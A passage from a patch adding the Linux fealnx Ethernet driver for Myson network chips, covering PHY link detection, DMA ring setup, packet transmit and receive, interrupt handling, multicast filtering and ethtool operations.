++	if (np->PHYType == MysonPHY) {	/* 3-in-1 case */
++		if (ioread32(np->mem + TCRRCR) & CR_R_FD)
++			np->duplexmode = 2;	/* full duplex */
++		else
++			np->duplexmode = 1;	/* half duplex */
++		if (ioread32(np->mem + TCRRCR) & CR_R_PS10)
++			np->line_speed = 1;	/* 10M */
++		else
++			np->line_speed = 2;	/* 100M */
++	} else {
++		if (np->PHYType == SeeqPHY) {	/* this PHY is SEEQ 80225 */
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], MIIRegister18);
++			if (data & SPD_DET_100)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++			if (data & DPLX_DET_FULL)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++		} else if (np->PHYType == AhdocPHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], DiagnosticReg);
++			if (data & Speed_100)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++			if (data & DPLX_FULL)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++		}
++/* 89/6/13 add, (begin) */
++		else if (np->PHYType == MarvellPHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], SpecificReg);
++			if (data & Full_Duplex)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++			data &= SpeedMask;
++			if (data == Speed_1000M)
++				np->line_speed = 3;	/* 1000M */
++			else if (data == Speed_100M)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++		}
++/* 89/6/13 add, (end) */
++/* 89/7/27 add, (begin) */
++		else if (np->PHYType == Myson981) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], StatusRegister);
++
++			if (data & SPEED100)
++				np->line_speed = 2;
++			else
++				np->line_speed = 1;
++
++			if (data & FULLMODE)
++				np->duplexmode = 2;
++			else
++				np->duplexmode = 1;
++		}
++/* 89/7/27 add, (end) */
++/* 89/12/29 add */
++		else if (np->PHYType == LevelOnePHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], SpecificReg);
++			if (data & LXT1000_Full)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++			data &= SpeedMask;
++			if (data == LXT1000_1000M)
++				np->line_speed = 3;	/* 1000M */
++			else if (data == LXT1000_100M)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++		}
++		np->crvalue &= (~CR_W_PS10) & (~CR_W_FD) & (~CR_W_PS1000);
++		if (np->line_speed == 1)
++			np->crvalue |= CR_W_PS10;
++		else if (np->line_speed == 3)
++			np->crvalue |= CR_W_PS1000;
++		if (np->duplexmode == 2)
++			np->crvalue |= CR_W_FD;
++	}
++}
++
++
++/* Take lock before calling this */
++static void allocate_rx_buffers(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	/*  allocate skb for rx buffers */
++	while (np->really_rx_count != RX_RING_SIZE) {
++		struct sk_buff *skb;
++
++		skb = netdev_alloc_skb(dev, np->rx_buf_sz);
++		if (skb == NULL)
++			break;	/* Better luck next round. */
++
++		while (np->lack_rxbuf->skbuff)
++			np->lack_rxbuf = np->lack_rxbuf->next_desc_logical;
++
++		np->lack_rxbuf->skbuff = skb;
++		np->lack_rxbuf->buffer = dma_map_single(&np->pci_dev->dev,
++							skb->data,
++							np->rx_buf_sz,
++							DMA_FROM_DEVICE);
++		np->lack_rxbuf->status = RXOWN;
++		++np->really_rx_count;
++	}
++}
++
++
++static void netdev_timer(struct timer_list *t)
++{
++	struct netdev_private *np = from_timer(np, t, timer);
++	struct net_device *dev = np->mii.dev;
++	void __iomem *ioaddr = np->mem;
++	int old_crvalue = np->crvalue;
++	unsigned int old_linkok = np->linkok;
++	unsigned long flags;
++
++	if (debug)
++		printk(KERN_DEBUG "%s: Media selection timer tick, status %8.8x "
++		       "config %8.8x.\n", dev->name, ioread32(ioaddr + ISR),
++		       ioread32(ioaddr + TCRRCR));
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	if (np->flags == HAS_MII_XCVR) {
++		getlinkstatus(dev);
++		if ((old_linkok == 0) && (np->linkok == 1)) {	/* we need to detect the media type again */
++			getlinktype(dev);
++			if (np->crvalue != old_crvalue) {
++				stop_nic_rxtx(ioaddr, np->crvalue);
++				iowrite32(np->crvalue, ioaddr + TCRRCR);
++			}
++		}
++	}
++
++	allocate_rx_buffers(dev);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++
++	np->timer.expires = RUN_AT(10 * HZ);
++	add_timer(&np->timer);
++}
++
++
++/* Take lock before calling */
++/* Reset chip and disable rx, tx and interrupts */
++static void reset_and_disable_rxtx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	int delay=51;
++
++	/* Reset the chip's Tx and Rx processes. */
++	stop_nic_rxtx(ioaddr, 0);
++
++	/* Disable interrupts by clearing the interrupt mask. */
++	iowrite32(0, ioaddr + IMR);
++
++	/* Reset the chip to erase previous misconfiguration. */
++	iowrite32(0x00000001, ioaddr + BCR);
++
++	/* Ueimor: wait for 50 PCI cycles (and flush posted writes btw).
++	   We surely wait too long (address+data phase). Who cares? */
++	while (--delay) {
++		ioread32(ioaddr + BCR);
++		rmb();
++	}
++}
++
++
++/* Take lock before calling */
++/* Restore chip after reset */
++static void enable_rxtx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	reset_rx_descriptors(dev);
++
++	iowrite32(np->tx_ring_dma + ((char*)np->cur_tx - (char*)np->tx_ring),
++		ioaddr + TXLBA);
++	iowrite32(np->rx_ring_dma + ((char*)np->cur_rx - (char*)np->rx_ring),
++		ioaddr + RXLBA);
++
++	iowrite32(np->bcrvalue, ioaddr + BCR);
++
++	iowrite32(0, ioaddr + RXPDR);
++	__set_rx_mode(dev); /* changes np->crvalue, writes it into TCRRCR */
++
++	/* Clear and Enable interrupts by setting the interrupt mask. */
++	iowrite32(FBE | TUNF | CNTOVF | RBU | TI | RI, ioaddr + ISR);
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	iowrite32(0, ioaddr + TXPDR);
++}
++
++
++static void reset_timer(struct timer_list *t)
++{
++	struct netdev_private *np = from_timer(np, t, reset_timer);
++	struct net_device *dev = np->mii.dev;
++	unsigned long flags;
++
++	printk(KERN_WARNING "%s: resetting tx and rx machinery\n", dev->name);
++
++	spin_lock_irqsave(&np->lock, flags);
++	np->crvalue = np->crvalue_sv;
++	np->imrvalue = np->imrvalue_sv;
++
++	reset_and_disable_rxtx(dev);
++	/* works for me without this:
++	reset_tx_descriptors(dev); */
++	enable_rxtx(dev);
++	netif_start_queue(dev); /* FIXME: or netif_wake_queue(dev); ? */
++
++	np->reset_timer_armed = 0;
++
++	spin_unlock_irqrestore(&np->lock, flags);
++}
++
++
++static void fealnx_tx_timeout(struct net_device *dev, unsigned int txqueue)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	unsigned long flags;
++	int i;
++
++	printk(KERN_WARNING
++	       "%s: Transmit timed out, status %8.8x, resetting...\n",
++	       dev->name, ioread32(ioaddr + ISR));
++
++	{
++		printk(KERN_DEBUG "  Rx ring %p: ", np->rx_ring);
++		for (i = 0; i < RX_RING_SIZE; i++)
++			printk(KERN_CONT " %8.8x",
++			       (unsigned int) np->rx_ring[i].status);
++		printk(KERN_CONT "\n");
++		printk(KERN_DEBUG "  Tx ring %p: ", np->tx_ring);
++		for (i = 0; i < TX_RING_SIZE; i++)
++			printk(KERN_CONT " %4.4x", np->tx_ring[i].status);
++		printk(KERN_CONT "\n");
++	}
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	reset_and_disable_rxtx(dev);
++	reset_tx_descriptors(dev);
++	enable_rxtx(dev);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++
++	netif_trans_update(dev); /* prevent tx timeout */
++	dev->stats.tx_errors++;
++	netif_wake_queue(dev); /* or .._start_.. ?? */
++}
++
++
++/* Initialize the Rx and Tx rings, along with various 'dev' bits. */
++static void init_ring(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int i;
++
++	/* initialize rx variables */
++	np->rx_buf_sz = (dev->mtu <= 1500 ? PKT_BUF_SZ : dev->mtu + 32);
++	np->cur_rx = &np->rx_ring[0];
++	np->lack_rxbuf = np->rx_ring;
++	np->really_rx_count = 0;
++
++	/* initial rx descriptors. */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		np->rx_ring[i].status = 0;
++		np->rx_ring[i].control = np->rx_buf_sz << RBSShift;
++		np->rx_ring[i].next_desc = np->rx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		np->rx_ring[i].next_desc_logical = &np->rx_ring[i + 1];
++		np->rx_ring[i].skbuff = NULL;
++	}
++
++	/* for the last rx descriptor */
++	np->rx_ring[i - 1].next_desc = np->rx_ring_dma;
++	np->rx_ring[i - 1].next_desc_logical = np->rx_ring;
++
++	/* allocate skb for rx buffers */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		struct sk_buff *skb = netdev_alloc_skb(dev, np->rx_buf_sz);
++
++		if (skb == NULL) {
++			np->lack_rxbuf = &np->rx_ring[i];
++			break;
++		}
++
++		++np->really_rx_count;
++		np->rx_ring[i].skbuff = skb;
++		np->rx_ring[i].buffer = dma_map_single(&np->pci_dev->dev,
++						       skb->data,
++						       np->rx_buf_sz,
++						       DMA_FROM_DEVICE);
++		np->rx_ring[i].status = RXOWN;
++		np->rx_ring[i].control |= RXIC;
++	}
++
++	/* initialize tx variables */
++	np->cur_tx = &np->tx_ring[0];
++	np->cur_tx_copy = &np->tx_ring[0];
++	np->really_tx_count = 0;
++	np->free_tx_count = TX_RING_SIZE;
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		np->tx_ring[i].status = 0;
++		/* do we need np->tx_ring[i].control = XXX; ?? */
++		np->tx_ring[i].next_desc = np->tx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		np->tx_ring[i].next_desc_logical = &np->tx_ring[i + 1];
++		np->tx_ring[i].skbuff = NULL;
++	}
++
++	/* for the last tx descriptor */
++	np->tx_ring[i - 1].next_desc = np->tx_ring_dma;
++	np->tx_ring[i - 1].next_desc_logical = &np->tx_ring[0];
++}
++
++
++static netdev_tx_t start_tx(struct sk_buff *skb, struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	np->cur_tx_copy->skbuff = skb;
++
++#define one_buffer
++#define BPT 1022
++#if defined(one_buffer)
++	np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev, skb->data,
++						 skb->len, DMA_TO_DEVICE);
++	np->cur_tx_copy->control = TXIC | TXLD | TXFD | CRCEnable | PADEnable;
++	np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++	np->cur_tx_copy->control |= (skb->len << TBSShift);	/* buffer size */
++// 89/12/29 add,
++	if (np->pci_dev->device == 0x891)
++		np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++	np->cur_tx_copy->status = TXOWN;
++	np->cur_tx_copy = np->cur_tx_copy->next_desc_logical;
++	--np->free_tx_count;
++#elif defined(two_buffer)
++	if (skb->len > BPT) {
++		struct fealnx_desc *next;
++
++		/* for the first descriptor */
++		np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev,
++							 skb->data, BPT,
++							 DMA_TO_DEVICE);
++		np->cur_tx_copy->control = TXIC | TXFD | CRCEnable | PADEnable;
++		np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++		np->cur_tx_copy->control |= (BPT << TBSShift);	/* buffer size */
++
++		/* for the last descriptor */
++		next = np->cur_tx_copy->next_desc_logical;
++		next->skbuff = skb;
++		next->control = TXIC | TXLD | CRCEnable | PADEnable;
++		next->control |= (skb->len << PKTSShift);	/* pkt size */
++		next->control |= ((skb->len - BPT) << TBSShift);	/* buf size */
++// 89/12/29 add,
++		if (np->pci_dev->device == 0x891)
++			np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++		next->buffer = dma_map_single(&ep->pci_dev->dev,
++					      skb->data + BPT, skb->len - BPT,
++					      DMA_TO_DEVICE);
++
++		next->status = TXOWN;
++		np->cur_tx_copy->status = TXOWN;
++
++		np->cur_tx_copy = next->next_desc_logical;
++		np->free_tx_count -= 2;
++	} else {
++		np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev,
++							 skb->data, skb->len,
++							 DMA_TO_DEVICE);
++		np->cur_tx_copy->control = TXIC | TXLD | TXFD | CRCEnable | PADEnable;
++		np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++		np->cur_tx_copy->control |= (skb->len << TBSShift);	/* buffer size */
++// 89/12/29 add,
++		if (np->pci_dev->device == 0x891)
++			np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++		np->cur_tx_copy->status = TXOWN;
++		np->cur_tx_copy = np->cur_tx_copy->next_desc_logical;
++		--np->free_tx_count;
++	}
++#endif
++
++	if (np->free_tx_count < 2)
++		netif_stop_queue(dev);
++	++np->really_tx_count;
++	iowrite32(0, np->mem + TXPDR);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++	return NETDEV_TX_OK;
++}
++
++
++/* Take lock before calling */
++/* Chip probably hosed tx ring. Clean up. */
++static void reset_tx_descriptors(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	struct fealnx_desc *cur;
++	int i;
++
++	/* initialize tx variables */
++	np->cur_tx = &np->tx_ring[0];
++	np->cur_tx_copy = &np->tx_ring[0];
++	np->really_tx_count = 0;
++	np->free_tx_count = TX_RING_SIZE;
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		cur = &np->tx_ring[i];
++		if (cur->skbuff) {
++			dma_unmap_single(&np->pci_dev->dev, cur->buffer,
++					 cur->skbuff->len, DMA_TO_DEVICE);
++			dev_kfree_skb_any(cur->skbuff);
++			cur->skbuff = NULL;
++		}
++		cur->status = 0;
++		cur->control = 0;	/* needed? */
++		/* probably not needed. We do it for purely paranoid reasons */
++		cur->next_desc = np->tx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		cur->next_desc_logical = &np->tx_ring[i + 1];
++	}
++	/* for the last tx descriptor */
++	np->tx_ring[TX_RING_SIZE - 1].next_desc = np->tx_ring_dma;
++	np->tx_ring[TX_RING_SIZE - 1].next_desc_logical = &np->tx_ring[0];
++}
++
++
++/* Take lock and stop rx before calling this */
++static void reset_rx_descriptors(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	struct fealnx_desc *cur = np->cur_rx;
++	int i;
++
++	allocate_rx_buffers(dev);
++
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		if (cur->skbuff)
++			cur->status = RXOWN;
++		cur = cur->next_desc_logical;
++	}
++
++	iowrite32(np->rx_ring_dma + ((char*)np->cur_rx - (char*)np->rx_ring),
++		np->mem + RXLBA);
++}
++
++
++/* The interrupt handler does all of the Rx thread work and cleans up
++   after the Tx thread. */
++static irqreturn_t intr_handler(int irq, void *dev_instance)
++{
++	struct net_device *dev = (struct net_device *) dev_instance;
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	long boguscnt = max_interrupt_work;
++	unsigned int num_tx = 0;
++	int handled = 0;
++
++	spin_lock(&np->lock);
++
++	iowrite32(0, ioaddr + IMR);
++
++	do {
++		u32 intr_status = ioread32(ioaddr + ISR);
++
++		/* Acknowledge all of the current interrupt sources ASAP. */
++		iowrite32(intr_status, ioaddr + ISR);
++
++		if (debug)
++			printk(KERN_DEBUG "%s: Interrupt, status %4.4x.\n", dev->name,
++			       intr_status);
++
++		if (!(intr_status & np->imrvalue))
++			break;
++
++		handled = 1;
++
++// 90/1/16 delete,
++//
++//      if (intr_status & FBE)
++//      {   /* fatal error */
++//          stop_nic_tx(ioaddr, 0);
++//          stop_nic_rx(ioaddr, 0);
++//          break;
++//      };
++
++		if (intr_status & TUNF)
++			iowrite32(0, ioaddr + TXPDR);
++
++		if (intr_status & CNTOVF) {
++			/* missed pkts */
++			dev->stats.rx_missed_errors +=
++				ioread32(ioaddr + TALLY) & 0x7fff;
++
++			/* crc error */
++			dev->stats.rx_crc_errors +=
++			    (ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++		}
++
++		if (intr_status & (RI | RBU)) {
++			if (intr_status & RI)
++				netdev_rx(dev);
++			else {
++				stop_nic_rx(ioaddr, np->crvalue);
++				reset_rx_descriptors(dev);
++				iowrite32(np->crvalue, ioaddr + TCRRCR);
++			}
++		}
++
++		while (np->really_tx_count) {
++			long tx_status = np->cur_tx->status;
++			long tx_control = np->cur_tx->control;
++
++			if (!(tx_control & TXLD)) {	/* this pkt is combined by two tx descriptors */
++				struct fealnx_desc *next;
++
++				next = np->cur_tx->next_desc_logical;
++				tx_status = next->status;
++				tx_control = next->control;
++			}
++
++			if (tx_status & TXOWN)
++				break;
++
++			if (!(np->crvalue & CR_W_ENH)) {
++				if (tx_status & (CSL | LC | EC | UDF | HF)) {
++					dev->stats.tx_errors++;
++					if (tx_status & EC)
++						dev->stats.tx_aborted_errors++;
++					if (tx_status & CSL)
++						dev->stats.tx_carrier_errors++;
++					if (tx_status & LC)
++						dev->stats.tx_window_errors++;
++					if (tx_status & UDF)
++						dev->stats.tx_fifo_errors++;
++					if ((tx_status & HF) && np->mii.full_duplex == 0)
++						dev->stats.tx_heartbeat_errors++;
++
++				} else {
++					dev->stats.tx_bytes +=
++					    ((tx_control & PKTSMask) >> PKTSShift);
++
++					dev->stats.collisions +=
++					    ((tx_status & NCRMask) >> NCRShift);
++					dev->stats.tx_packets++;
++				}
++			} else {
++				dev->stats.tx_bytes +=
++				    ((tx_control & PKTSMask) >> PKTSShift);
++				dev->stats.tx_packets++;
++			}
++
++			/* Free the original skb. */
++			dma_unmap_single(&np->pci_dev->dev,
++					 np->cur_tx->buffer,
++					 np->cur_tx->skbuff->len,
++					 DMA_TO_DEVICE);
++			dev_consume_skb_irq(np->cur_tx->skbuff);
++			np->cur_tx->skbuff = NULL;
++			--np->really_tx_count;
++			if (np->cur_tx->control & TXLD) {
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				++np->free_tx_count;
++			} else {
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				np->free_tx_count += 2;
++			}
++			num_tx++;
++		}		/* end of for loop */
++
++		if (num_tx && np->free_tx_count >= 2)
++			netif_wake_queue(dev);
++
++		/* read transmit status for enhanced mode only */
++		if (np->crvalue & CR_W_ENH) {
++			long data;
++
++			data = ioread32(ioaddr + TSR);
++			dev->stats.tx_errors += (data & 0xff000000) >> 24;
++			dev->stats.tx_aborted_errors +=
++				(data & 0xff000000) >> 24;
++			dev->stats.tx_window_errors +=
++				(data & 0x00ff0000) >> 16;
++			dev->stats.collisions += (data & 0x0000ffff);
++		}
++
++		if (--boguscnt < 0) {
++			printk(KERN_WARNING "%s: Too much work at interrupt, "
++			       "status=0x%4.4x.\n", dev->name, intr_status);
++			if (!np->reset_timer_armed) {
++				np->reset_timer_armed = 1;
++				np->reset_timer.expires = RUN_AT(HZ/2);
++				add_timer(&np->reset_timer);
++				stop_nic_rxtx(ioaddr, 0);
++				netif_stop_queue(dev);
++				/* or netif_tx_disable(dev); ?? */
++				/* Prevent other paths from enabling tx,rx,intrs */
++				np->crvalue_sv = np->crvalue;
++				np->imrvalue_sv = np->imrvalue;
++				np->crvalue &= ~(CR_W_TXEN | CR_W_RXEN); /* or simply = 0? */
++				np->imrvalue = 0;
++			}
++
++			break;
++		}
++	} while (1);
++
++	/* read the tally counters */
++	/* missed pkts */
++	dev->stats.rx_missed_errors += ioread32(ioaddr + TALLY) & 0x7fff;
++
++	/* crc error */
++	dev->stats.rx_crc_errors +=
++		(ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++
++	if (debug)
++		printk(KERN_DEBUG "%s: exiting interrupt, status=%#4.4x.\n",
++		       dev->name, ioread32(ioaddr + ISR));
++
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	spin_unlock(&np->lock);
++
++	return IRQ_RETVAL(handled);
++}
++
++
++/* This routine is logically part of the interrupt handler, but separated
++   for clarity and better register allocation. */
++static int netdev_rx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	/* If EOP is set on the next entry, it's a new packet. Send it up. */
++	while (!(np->cur_rx->status & RXOWN) && np->cur_rx->skbuff) {
++		s32 rx_status = np->cur_rx->status;
++
++		if (np->really_rx_count == 0)
++			break;
++
++		if (debug)
++			printk(KERN_DEBUG "  netdev_rx() status was %8.8x.\n", rx_status);
++
++		if ((!((rx_status & RXFSD) && (rx_status & RXLSD))) ||
++		    (rx_status & ErrorSummary)) {
++			if (rx_status & ErrorSummary) {	/* there was a fatal error */
++				if (debug)
++					printk(KERN_DEBUG
++					       "%s: Receive error, Rx status %8.8x.\n",
++					       dev->name, rx_status);
++
++				dev->stats.rx_errors++;	/* end of a packet. */
++				if (rx_status & (LONGPKT | RUNTPKT))
++					dev->stats.rx_length_errors++;
++				if (rx_status & RXER)
++					dev->stats.rx_frame_errors++;
++				if (rx_status & CRC)
++					dev->stats.rx_crc_errors++;
++			} else {
++				int need_to_reset = 0;
++				int desno = 0;
++
++				if (rx_status & RXFSD) {	/* this pkt is too long, over one rx buffer */
++					struct fealnx_desc *cur;
++
++					/* check this packet is received completely? */
++					cur = np->cur_rx;
++					while (desno <= np->really_rx_count) {
++						++desno;
++						if ((!(cur->status & RXOWN)) &&
++						    (cur->status & RXLSD))
++							break;
++						/* goto next rx descriptor */
++						cur = cur->next_desc_logical;
++					}
++					if (desno > np->really_rx_count)
++						need_to_reset = 1;
++				} else	/* RXLSD did not find, something error */
++					need_to_reset = 1;
++
++				if (need_to_reset == 0) {
++					int i;
++
++					dev->stats.rx_length_errors++;
++
++					/* free all rx descriptors related this long pkt */
++					for (i = 0; i < desno; ++i) {
++						if (!np->cur_rx->skbuff) {
++							printk(KERN_DEBUG
++								"%s: I'm scared\n", dev->name);
++							break;
++						}
++						np->cur_rx->status = RXOWN;
++						np->cur_rx = np->cur_rx->next_desc_logical;
++					}
++					continue;
++				} else {        /* rx error, need to reset this chip */
++					stop_nic_rx(ioaddr, np->crvalue);
++					reset_rx_descriptors(dev);
++					iowrite32(np->crvalue, ioaddr + TCRRCR);
++				}
++				break;	/* exit the while loop */
++			}
++		} else {	/* this received pkt is ok */
++
++			struct sk_buff *skb;
++			/* Omit the four octet CRC from the length. */
++			short pkt_len = ((rx_status & FLNGMASK) >> FLNGShift) - 4;
++
++#ifndef final_version
++			if (debug)
++				printk(KERN_DEBUG "  netdev_rx() normal Rx pkt length %d"
++				       " status %x.\n", pkt_len, rx_status);
++#endif
++
++			/* Check if the packet is long enough to accept without copying
++			   to a minimally-sized skbuff. */
++			if (pkt_len < rx_copybreak &&
++			    (skb = netdev_alloc_skb(dev, pkt_len + 2)) != NULL) {
++				skb_reserve(skb, 2);	/* 16 byte align the IP header */
++				dma_sync_single_for_cpu(&np->pci_dev->dev,
++							np->cur_rx->buffer,
++							np->rx_buf_sz,
++							DMA_FROM_DEVICE);
++				/* Call copy + cksum if available. */
++
++#if ! defined(__alpha__)
++				skb_copy_to_linear_data(skb,
++					np->cur_rx->skbuff->data, pkt_len);
++				skb_put(skb, pkt_len);
++#else
++				skb_put_data(skb, np->cur_rx->skbuff->data,
++					     pkt_len);
++#endif
++				dma_sync_single_for_device(&np->pci_dev->dev,
++							   np->cur_rx->buffer,
++							   np->rx_buf_sz,
++							   DMA_FROM_DEVICE);
++			} else {
++				dma_unmap_single(&np->pci_dev->dev,
++						 np->cur_rx->buffer,
++						 np->rx_buf_sz,
++						 DMA_FROM_DEVICE);
++				skb_put(skb = np->cur_rx->skbuff, pkt_len);
++				np->cur_rx->skbuff = NULL;
++				--np->really_rx_count;
++			}
++			skb->protocol = eth_type_trans(skb, dev);
++			netif_rx(skb);
++			dev->stats.rx_packets++;
++			dev->stats.rx_bytes += pkt_len;
++		}
++
++		np->cur_rx = np->cur_rx->next_desc_logical;
++	}			/* end of while loop */
++
++	/*  allocate skb for rx buffers */
++	allocate_rx_buffers(dev);
++
++	return 0;
++}
++
++
++static struct net_device_stats *get_stats(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	/* The chip only need report frame silently dropped. */
++	if (netif_running(dev)) {
++		dev->stats.rx_missed_errors +=
++			ioread32(ioaddr + TALLY) & 0x7fff;
++		dev->stats.rx_crc_errors +=
++			(ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++	}
++
++	return &dev->stats;
++}
++
++
++/* for dev->set_multicast_list */
++static void set_rx_mode(struct net_device *dev)
++{
++	spinlock_t *lp = &((struct netdev_private *)netdev_priv(dev))->lock;
++	unsigned long flags;
++	spin_lock_irqsave(lp, flags);
++	__set_rx_mode(dev);
++	spin_unlock_irqrestore(lp, flags);
++}
++
++
++/* Take lock before calling */
++static void __set_rx_mode(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	u32 mc_filter[2];	/* Multicast hash filter */
++	u32 rx_mode;
++
++	if (dev->flags & IFF_PROMISC) {	/* Set promiscuous. */
++		memset(mc_filter, 0xff, sizeof(mc_filter));
++		rx_mode = CR_W_PROM | CR_W_AB | CR_W_AM;
++	} else if ((netdev_mc_count(dev) > multicast_filter_limit) ||
++		   (dev->flags & IFF_ALLMULTI)) {
++		/* Too many to match, or accept all multicasts. */
++		memset(mc_filter, 0xff, sizeof(mc_filter));
++		rx_mode = CR_W_AB | CR_W_AM;
++	} else {
++		struct netdev_hw_addr *ha;
++
++		memset(mc_filter, 0, sizeof(mc_filter));
++		netdev_for_each_mc_addr(ha, dev) {
++			unsigned int bit;
++			bit = (ether_crc(ETH_ALEN, ha->addr) >> 26) ^ 0x3F;
++			mc_filter[bit >> 5] |= (1 << bit);
++		}
++		rx_mode = CR_W_AB | CR_W_AM;
++	}
++
++	stop_nic_rxtx(ioaddr, np->crvalue);
++
++	iowrite32(mc_filter[0], ioaddr + MAR0);
++	iowrite32(mc_filter[1], ioaddr + MAR1);
++	np->crvalue &= ~CR_W_RXMODEMASK;
++	np->crvalue |= rx_mode;
++	iowrite32(np->crvalue, ioaddr + TCRRCR);
++}
++
++static void netdev_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	strscpy(info->driver, DRV_NAME, sizeof(info->driver));
++	strscpy(info->bus_info, pci_name(np->pci_dev), sizeof(info->bus_info));
++}
++
++static int netdev_get_link_ksettings(struct net_device *dev,
++				     struct ethtool_link_ksettings *cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	spin_lock_irq(&np->lock);
++	mii_ethtool_get_link_ksettings(&np->mii, cmd);
++	spin_unlock_irq(&np->lock);
++
++	return 0;
++}
++
++static int netdev_set_link_ksettings(struct net_device *dev,
++				     const struct ethtool_link_ksettings *cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int rc;
++
++	spin_lock_irq(&np->lock);
++	rc = mii_ethtool_set_link_ksettings(&np->mii, cmd);
++	spin_unlock_irq(&np->lock);
++
++	return rc;
++}
++
++static int netdev_nway_reset(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	return mii_nway_restart(&np->mii);
++}
++
++static u32 netdev_get_link(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	return mii_link_ok(&np->mii);
++}
++
++static u32 netdev_get_msglevel(struct net_device *dev)
++{
++	return debug;
++}
++
++static void netdev_set_msglevel(struct net_device *dev, u32 value)
++{
++	debug = value;
++}
++
++static const struct ethtool_ops netdev_ethtool_ops = {
++	.get_drvinfo		= netdev_get_drvinfo,
++	.nway_reset		= netdev_nway_reset,
++	.get_link		= netdev_get_link,
++	.get_msglevel		= netdev_get_msglevel,
++	.set_msglevel		= netdev_set_msglevel,
++	.get_link_ksettings	= netdev_get_link_ksettings,
++	.set_link_ksettings	= netdev_set_link_ksettings,
++};
++
++static int mii_ioctl(struct net_device *dev, struct ifreq *rq, int cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int rc;
++
++	if (!netif_running(dev))
++		return -EINVAL;
++
++	spin_lock_irq(&np->lock);
++	rc = generic_mii_ioctl(&np->mii, if_mii(rq), cmd, NULL);
++	spin_unlock_irq(&np->lock);
++
++	return rc;
++}
++
++
++static int netdev_close(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	int i;
++
++	netif_stop_queue(dev);
++
++	/* Disable interrupts by clearing the interrupt mask. */
++	iowrite32(0x0000, ioaddr + IMR);
++
++	/* Stop the chip's Tx and Rx processes. */
++	stop_nic_rxtx(ioaddr, 0);
++
++	del_timer_sync(&np->timer);
++	del_timer_sync(&np->reset_timer);
++
++	free_irq(np->pci_dev->irq, dev);
++
++	/* Free all the skbuffs in the Rx queue. */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		struct sk_buff *skb = np->rx_ring[i].skbuff;
++
++		np->rx_ring[i].status = 0;
++		if (skb) {
